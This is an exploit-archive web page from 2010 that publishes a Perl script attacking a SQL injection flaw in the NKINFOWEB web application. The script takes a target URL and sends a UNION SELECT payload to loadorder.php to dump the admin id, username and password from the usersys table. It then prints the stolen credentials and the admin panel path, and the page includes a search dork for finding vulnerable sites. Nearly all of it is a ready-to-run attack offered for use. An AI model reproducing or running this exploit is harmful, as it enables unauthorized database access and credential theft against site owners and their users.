Home / os / win7

NKINFOWEB SQL Injection Exploit

Posted on 23 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>NKINFOWEB SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===============================
NKINFOWEB SQL Injection Exploit
===============================

# Software Link: http://jaist.dl.sourceforge.net/project/nkinfoweb/FunctionNkinfoweb_v.species.rar
# Tested on: several linux versions
 
#=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
 
  
 
#!/usr/bin/perl
 use strict;
 use LWP::Simple;
 
print &quot;
&quot;; 
print &quot;##############################################################
&quot;; 
print &quot;# NKINFOWEB SQL INJECTION EXPLOIT                            #
&quot;; 
print &quot;# Author: d4rk-h4ck3r  (Tunisian Security Team)              #
&quot;; 
print &quot;# Greetz to Passeword &amp; Maxilog &amp; all vbspiders members      #
&quot;;
print &quot;# Dork: Powered by NKINFOWEB VSp © 2009                      #
&quot;;
print &quot;##############################################################
&quot;; 
 
 my $domain = shift @ARGV or banner();
 my $injsql =&quot;/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--&quot;;
 
 if(get($domain.$injsql) =~ /:::(.+):(.+):(.+):::/)
 {
   print &quot;
[+] Exploit Succesfull!&quot;;
   print &quot;
[+] Admin id: : $1&quot;; 
   print &quot;
[+] Admin username: $2&quot;; 
   print &quot;
[+] Admin password: $3&quot;;
   print &quot;
[+] Admin panel: $domain/administrator/ &quot;;}
 else
 {
   print &quot;[!] Exploit Failed!
&quot;;
   print &quot;[!] Site Not Vulnerable!
&quot;;
 }
 
 sub banner
 {
   print &quot;[+] NKINFOWEB &lt;= Remote SQL Injection Exploit
&quot;;
   print &quot;[+] Usage: ${0} http://[host]
&quot;;
   return exit;
 }


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :